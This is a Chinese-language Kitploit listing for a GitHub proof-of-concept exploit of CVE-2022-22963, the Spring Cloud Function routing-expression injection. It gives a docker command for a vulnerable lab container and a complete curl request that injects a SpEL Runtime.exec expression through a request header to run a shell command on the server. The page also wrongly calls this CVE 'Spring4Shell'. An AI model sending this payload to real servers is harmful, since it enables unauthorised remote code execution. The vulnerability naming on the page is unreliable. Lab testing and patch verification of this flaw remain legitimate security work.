Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22963 — 针对 CVE-2022-22963(Spring4Shell)的概念验证漏洞利用,包含一个易受攻击的 Docker 容器以及通过 Spring Cloud Function 路由表达式实现基于 curl 的远程代码执行。 | Kitploit
工具/GitHubGitHub/darryk10/cve-2022-22963
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

针对 CVE-2022-22963(Spring4Shell)的概念验证漏洞利用,包含一个易受攻击的 Docker 容器以及通过 Spring Cloud Function 路由表达式实现基于 curl 的远程代码执行。

查看仓库
34164年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-22963 - Spring4shell

要运行有漏洞的SpringBoot应用程序,请运行这个docker容器,并将其暴露在8080端口。 示例:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

漏洞利用

Curl命令:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

或使用Burp suite:

Burpsuite

致谢

https://github.com/hktalent/spring-spel-0day-poc

下载工具